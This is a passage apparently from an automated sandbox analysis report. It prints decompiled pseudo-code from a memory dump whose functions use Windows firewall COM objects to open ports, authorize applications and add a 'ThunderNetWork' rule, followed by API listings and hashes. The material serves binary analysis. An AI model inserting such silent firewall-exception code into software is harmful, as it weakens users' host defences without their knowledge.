											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
											_t95 = _v28;
											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E000180F0( &_v40, _v56));
											_t100 = _v28;
											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
											_t102 = _v28;
											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
											_t104 = _v28;
											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
											_t106 = _v40;
											_t128 =  &_v36;
											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
											_t110 = _t107;
											if(_t107 >= 0) {
												_t108 = _v36;
												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
											}
										}
										_t130 = 0;
									}
								}
							}
						}
					}
				}
				_t67 = _v28;
				if(_t67 != _t130) {
					 *((intOrPtr*)( *_t67 + 8))(_t67);
				}
				_t68 = _v36;
				if(_t68 != _t130) {
					 *((intOrPtr*)( *_t68 + 8))(_t68);
				}
				_t69 = _v40;
				if(_t69 != _t130) {
					 *((intOrPtr*)( *_t69 + 8))(_t69);
				}
				_t70 = _v44;
				if(_t70 != _t130) {
					 *((intOrPtr*)( *_t70 + 8))(_t70);
				}
				_t71 = _v32;
				if(_t71 != _t130) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				__imp__CoUninitialize();
				return E00011C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
			}

0x0001195c
0x00011962
0x00011969
0x00011972
0x00011978
0x0001197b
0x0001197e
0x0001198d
0x00011990
0x00011993
0x00011996
0x00011999
0x0001199c
0x000119a2
0x000119a8
0x000119ac
0x000119b2
0x000119c8
0x000119ca
0x000119ce
0x000119d4
0x000119d9
0x000119de
0x000119e1
0x000119e5
0x000119eb
0x000119f0
0x000119f5
0x000119f8
0x000119fc
0x00011a0b
0x00011a11
0x00011a17
0x00011a1b
0x00011a31
0x00011a33
0x00011a37
0x00011a3d
0x00011a43
0x00011a4a
0x00011a59
0x00011a5b
0x00011a64
0x00011a67
0x00011a70
0x00011a84
0x00011a87
0x00011a8f
0x00011a92
0x00011a9a
0x00011a9d
0x00011aa5
0x00011aa8
0x00011aad
0x00011ab2
0x00011ab5
0x00011ab9
0x00011abb
0x00011ac7
0x00011ac7
0x00011ab9
0x00011ac9
0x00011ac9
0x00011a37
0x00011a1b
0x000119fc
0x000119e5
0x000119ce
0x00011acb
0x00011ad0
0x00011ad5
0x00011ad5
0x00011ad8
0x00011add
0x00011ae2
0x00011ae2
0x00011ae5
0x00011aea
0x00011aef
0x00011aef
0x00011af2
0x00011af7
0x00011afc
0x00011afc
0x00011aff
0x00011b04
0x00011b09
0x00011b09
0x00011b0c
0x00011b22

APIs

CoInitialize.OLE32(00000000), ref: 0001197E
_com_util::ConvertStringToBSTR.COMSUPP ref: 0001199C
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 000119A2
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 000119C8
_com_util::ConvertStringToBSTR.COMSUPP ref: 00011A0B

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00011A11
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 00011A31

Part of subcall function 00011071: __wcstoui64.LIBCMT ref: 000110DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 00011A7B

Part of subcall function 000180F0: _malloc.LIBCMT ref: 000181A1

CoUninitialize.OLE32 ref: 00011B0C

Strings

HNetCfg.FwOpenPort, xrefs: 00011A06
HNetCfg.FwMgr, xrefs: 00011988

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
API String ID: 3570467124-3777566516
Opcode ID: d20c13870a46fccf9946bc8bec648fce4c70a9957472ddf76cbc2f9f78171871
Instruction ID: 01e866277c015c6e15421325e2d6bf9ef7d8a25d6920ad7669c7d91d88838827
Opcode Fuzzy Hash: d20c13870a46fccf9946bc8bec648fce4c70a9957472ddf76cbc2f9f78171871
Instruction Fuzzy Hash: F9510975A01219AFCB04DFE4C888DEEBBB9EF4D700B544455F601EB251DB75AD82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0001323D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0001323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x1dd18);
				E00013F70(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00012003(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x1c870;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x1f010;
				E00013C3D(_t35, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00013312();
				E00013C3D(_t35, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x1f618; // 0x1f540
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00012EFA( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00013FB5(E0001331B());
			}

0x0001323d
0x0001323d
0x0001323f
0x00013244
0x00013249
0x0001324f
0x00013257
0x0001325a
0x0001325f
0x00013260
0x00013263
0x00013266
0x00013270
0x00013275
0x0001327d
0x00013285
0x00013295
0x00013295
0x0001329b
0x0001329e
0x000132a5
0x000132ac
0x000132b5
0x000132bb
0x000132c2
0x000132c8
0x000132cf
0x000132d6
0x000132dc
0x000132df
0x000132e2
0x000132e7
0x000132e9
0x000132ee
0x000132ee
0x000132f4
0x000132fa
0x0001330b

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0001DD18,0000000C,00013378,00000000,00000000,?,00000000,?,000190BC,00000000,00010000,00030000,?,000184B4), ref: 0001324F
__crt_waiting_on_module_handle.LIBCMT ref: 0001325A

Part of subcall function 00012003: Sleep.KERNEL32(000003E8,00000000,?,000131A0,KERNEL32.DLL,?,000131EC,?,00000000,?,000190BC,00000000,00010000,00030000,?,000184B4), ref: 0001200F
Part of subcall function 00012003: GetModuleHandleW.KERNEL32(00000000,?,000131A0,KERNEL32.DLL,?,000131EC,?,00000000,?,000190BC,00000000,00010000,00030000,?,000184B4), ref: 00012018

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00013283
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00013293
__lock.LIBCMT ref: 000132B5
InterlockedIncrement.KERNEL32(?), ref: 000132C2
__lock.LIBCMT ref: 000132D6
___addlocaleref.LIBCMT ref: 000132F4

Strings

KERNEL32.DLL, xrefs: 00013249, 0001324E, 00013259
EncodePointer, xrefs: 00013277
DecodePointer, xrefs: 0001328B

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: b8e45ce4ba2a5ac3e4915ed77567f3267b22de623affecbc2d955633f4a04055
Instruction ID: 6d86d75b1e3328e864488399acb63d4a5b585601b5d2534dc532f82342bdeb7a
Opcode Fuzzy Hash: b8e45ce4ba2a5ac3e4915ed77567f3267b22de623affecbc2d955633f4a04055
Instruction Fuzzy Hash: 34117271944701DBE721EF79D805BDABBF0AF04314F10851DE4A9A62A2CB78EA81DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00011191, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00011191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				char* _t110;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t138;

				_t131 = __edx;
				_t134 = __eax;
				_v44 = 0;
				_t110 = 0x80004005;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = E000180F0(__edx, _a4);
				_t67 = E000180F0(__edx, "ThunderNetWork");
				_v36 = _t67;
				_v28 = 0x100;
				__imp__#2(L"LAN");
				_v40 = _t67;
				E000180F0(__edx, _a8);
				_v32 = 0;
				if(E00011071(_t134,  &_v28,  &_v32) == 0) {
					_t135 = _v44;
				} else {
					_t80 = E000180F0(_t131, E00011C70(_t134, ":") + 1);
					_t138 = _t80;
					__imp__CoInitializeEx(0, 2);
					_t135 = _t80;
					if(_t135 == 0x80010106 || _t135 >= 0) {
						_t110 = E00011058( &_v20,  &_v20);
						if(_t110 >= 0) {
							_t83 = _v20;
							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
							if(_t110 >= 0) {
								_t85 = _v20;
								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
								if(_t110 >= 0) {
									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
										_v12 = _v12 ^ 0x00000004;
									}
									_t87 =  &_v8;
									__imp__CoCreateInstance(0x1db2c, 0, 1, 0x1db3c, _t87);
									_t110 = _t87;
									if(_t110 >= 0) {
										_t88 = _v16;
										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
										_t90 = _v8;
										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
										_t92 = _v8;
										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
										_t94 = _v8;
										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
										_t96 = _v8;
										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
										_t98 = _v8;
										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
										_t100 = _v8;
										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
										_t102 = _v8;
										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
										_t104 = _v8;
										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
										_t106 = _v8;
										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
										_t108 = _v16;
										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
									}
								}
							}
						}
					}
				}
				_t71 = _v8;
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 8))(_t72);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 8))(_t73);
				}
				if(_t135 >= 0) {
					__imp__CoUninitialize();
				}
				return _t110;
			}

0x00011191
0x0001119f
0x000111a1
0x000111a4
0x000111a9
0x000111ac
0x000111af
0x000111b2
0x000111bf
0x000111c2
0x000111cc
0x000111cf
0x000111d6
0x000111df
0x000111e2
0x000111ea
0x000111f9
0x00011337
0x000111ff
0x0001120e
0x00011217
0x00011219
0x0001121f
0x00011227
0x0001123a
0x0001123f
0x00011245
0x00011252
0x00011256
0x0001125c
0x00011269
0x0001126d
0x00011277
0x0001127f
0x0001127f
0x00011283
0x00011295
0x0001129b
0x0001129f
0x000112a5
0x000112ae
0x000112b1
0x000112ba
0x000112bd
0x000112c6
0x000112c9
0x000112d2
0x000112d5
0x000112de
0x000112e4
0x000112ec
0x000112f2
0x000112fa
0x00011300
0x00011309
0x0001130f
0x00011316
0x00011319
0x00011321
0x00011327
0x00011333
0x00011333
0x0001129f
0x0001126d
0x00011256
0x0001123f
0x00011227
0x0001133a
0x0001133f
0x00011344
0x00011344
0x00011347
0x0001134c
0x00011351
0x00011351
0x00011354
0x00011359
0x0001135e
0x0001135e
0x00011363
0x00011365
0x00011365
0x00011371

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 000111B5
_com_util::ConvertStringToBSTR.COMSUPP ref: 000111C2

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

SysAllocString.OLEAUT32(LAN), ref: 000111D6
_com_util::ConvertStringToBSTR.COMSUPP ref: 000111E2

Part of subcall function 000180F0: _malloc.LIBCMT ref: 000181A1

Part of subcall function 00011071: __wcstoui64.LIBCMT ref: 000110DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 0001120E
CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00011219
CoCreateInstance.OLE32(0001DB2C,00000000,00000001,0001DB3C,?), ref: 00011295
CoUninitialize.OLE32(?), ref: 00011365

Strings

LAN, xrefs: 000111C7
ThunderNetWork, xrefs: 000111BA

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
String ID: LAN$ThunderNetWork
API String ID: 1199507461-1899760959
Opcode ID: ad8099dafc8ee0695e1a3c53984d999bda62e890a6204f21d11267ff0d4cbb82
Instruction ID: a644ba42b7091cfefc70167ffcc16ddf8ca7e5dca8c7a1e16b2fdfd7f9a2618e
Opcode Fuzzy Hash: ad8099dafc8ee0695e1a3c53984d999bda62e890a6204f21d11267ff0d4cbb82
Instruction Fuzzy Hash: 58611C75A00209AFDB05DFE4C888ADE7BB9FF49314F104469FA15EB251CB759A82CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00011567, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00011567(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				char* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t51;
				intOrPtr* _t52;
				char* _t53;
				intOrPtr* _t54;
				char* _t55;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				intOrPtr* _t75;
				signed int _t78;

				_t74 = __edx;
				_t34 =  *0x1f008; // 0xd014837c
				_v12 = _t34 ^ _t78;
				_v48 = _a4;
				__imp__CoInitialize(0);
				_v44 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_t38 = E000180F0(__edx, "HNetCfg.FwMgr");
				_t75 = __imp__CLSIDFromProgID;
				_t39 =  *_t75(_t38,  &_v28);
				_t76 = _t39;
				if(_t39 == 0) {
					_t51 =  &_v28;
					__imp__CoCreateInstance(_t51, 0, 5, 0x1c17c,  &_v44);
					_t76 = _t51;
					if(_t51 >= 0) {
						_t52 = _v44;
						_t74 =  &_v36;
						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
						_t76 = _t53;
						if(_t53 >= 0) {
							_t54 = _v36;
							_t74 =  &_v40;
							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
							_t76 = _t55;
							if(_t55 >= 0) {
								_t58 =  *_t75(E000180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t76 = _t58;
								if(_t58 >= 0) {
									_t59 = _v40;
									_t74 =  &_v32;
									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
									_t76 = _t60;
									if(_t60 >= 0) {
										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E000180F0( &_v32, _v48));
									}
								}
							}
						}
					}
				}
				_t40 = _v32;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v40;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				_t42 = _v36;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42 + 8))(_t42);
				}
				_t43 = _v44;
				if(_t43 != 0) {
					 *((intOrPtr*)( *_t43 + 8))(_t43);
				}
				__imp__CoUninitialize();
				return E00011C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
			}

0x00011567
0x0001156d
0x00011574
0x00011580
0x00011583
0x00011592
0x00011595
0x00011598
0x0001159b
0x0001159e
0x000115a3
0x000115aa
0x000115ac
0x000115b0
0x000115c2
0x000115c6
0x000115cc
0x000115d0
0x000115d2
0x000115d7
0x000115dc
0x000115df
0x000115e3
0x000115e5
0x000115ea
0x000115ef
0x000115f2
0x000115f6
0x00011607
0x00011609
0x0001160d
0x0001160f
0x00011614
0x00011619
0x0001161c
0x00011620
0x00011636
0x00011636
0x00011620
0x0001160d
0x000115f6
0x000115e3
0x000115d0
0x00011638
0x0001163d
0x00011642
0x00011642
0x00011645
0x0001164a
0x0001164f
0x0001164f
0x00011652
0x00011657
0x0001165c
0x0001165c
0x0001165f
0x00011664
0x00011669
0x00011669
0x0001166c
0x00011682

APIs

CoInitialize.OLE32(00000000), ref: 00011583
_com_util::ConvertStringToBSTR.COMSUPP ref: 0001159E
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 000115AA
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 000115C6
_com_util::ConvertStringToBSTR.COMSUPP ref: 00011601

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00011607
_com_util::ConvertStringToBSTR.COMSUPP ref: 0001162A

Part of subcall function 000180F0: _malloc.LIBCMT ref: 000181A1

CoUninitialize.OLE32 ref: 0001166C

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 000115FC
HNetCfg.FwMgr, xrefs: 0001158D

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4188526640-1951265404
Opcode ID: 9ae52cd7d1b9689e7632eadb69ecdbc64868a217a67f3759abc7350d6338a050
Instruction ID: 4bd28997704c2c0ec3152c93240257af7b05103542eedccc2fbbc73aa19b2f12
Opcode Fuzzy Hash: 9ae52cd7d1b9689e7632eadb69ecdbc64868a217a67f3759abc7350d6338a050
Instruction Fuzzy Hash: 54414D71D002199FDB14EFA4C888CEEB7F9FF4D310B584569EA15F7251CA359C818B60

Uniqueness

Uniqueness Score: -1.00%

Function 00011683, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127
comCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00011683(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t43;
				char* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				char* _t56;
				intOrPtr* _t57;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				char* _t63;
				intOrPtr* _t64;
				char* _t65;
				intOrPtr* _t68;
				char _t83;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0x1f008; // 0xd014837c
				_v12 = _t39 ^ _t86;
				_t83 = 0;
				_v56 = _a4;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t43 = E000180F0(__edx, "HNetCfg.FwMgr");
				_t85 = __imp__CLSIDFromProgID;
				_t44 =  *_t85(_t43,  &_v28);
				_t70 = _t44;
				if(_t44 == 0) {
					_t56 =  &_v28;
					__imp__CoCreateInstance(_t56, 0, 5, 0x1c17c,  &_v32);
					_t70 = _t56;
					if(_t56 >= 0) {
						_t57 = _v32;
						_t82 =  &_v44;
						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
						_t70 = _t58;
						if(_t58 >= 0) {
							_t59 = _v44;
							_t82 =  &_v40;
							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
							_t70 = _t60;
							if(_t60 >= 0) {
								_t63 =  *_t85(E000180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t70 = _t63;
								if(_t63 >= 0) {
									_t64 = _v40;
									_t82 =  &_v36;
									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
									_t70 = _t65;
									if(_t65 >= 0) {
										_v52 = 0;
										_t85 =  &_v48;
										_v48 = 0x100;
										if(E00011071(_v56,  &_v48,  &_v52) != 0) {
											_t68 = _v36;
											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
										}
										_t83 = 0;
									}
								}
							}
						}
					}
				}
				_t45 = _v36;
				if(_t45 != _t83) {
					 *((intOrPtr*)( *_t45 + 8))(_t45);
				}
				_t46 = _v40;
				if(_t46 != _t83) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				_t47 = _v44;
				if(_t47 != _t83) {
					 *((intOrPtr*)( *_t47 + 8))(_t47);
				}
				_t48 = _v32;
				if(_t48 != _t83) {
					 *((intOrPtr*)( *_t48 + 8))(_t48);
				}
				__imp__CoUninitialize();
				return E00011C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

0x00011683
0x00011689
0x00011690
0x00011699
0x0001169c
0x0001169f
0x000116ae
0x000116b1
0x000116b4
0x000116b7
0x000116ba
0x000116bf
0x000116c6
0x000116c8
0x000116cc
0x000116de
0x000116e2
0x000116e8
0x000116ec
0x000116f2
0x000116f7
0x000116fc
0x000116ff
0x00011703
0x00011705
0x0001170a
0x0001170f
0x00011712
0x00011716
0x00011727
0x00011729
0x0001172d
0x0001172f
0x00011734
0x00011739
0x0001173c
0x00011740
0x00011745
0x0001174c
0x0001174f
0x0001175e
0x00011763
0x0001176f
0x0001176f
0x00011771
0x00011771
0x00011740
0x0001172d
0x00011716
0x00011703
0x000116ec
0x00011773
0x00011778
0x0001177d
0x0001177d
0x00011780
0x00011785
0x0001178a
0x0001178a
0x0001178d
0x00011792
0x00011797
0x00011797
0x0001179a
0x0001179f
0x000117a4
0x000117a4
0x000117a7
0x000117bd

APIs

CoInitialize.OLE32(00000000), ref: 0001169F
_com_util::ConvertStringToBSTR.COMSUPP ref: 000116BA
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 000116C6
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 000116E2
_com_util::ConvertStringToBSTR.COMSUPP ref: 00011721

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00011727

Part of subcall function 00011071: __wcstoui64.LIBCMT ref: 000110DB

CoUninitialize.OLE32 ref: 000117A7

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 0001171C
HNetCfg.FwMgr, xrefs: 000116A9

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
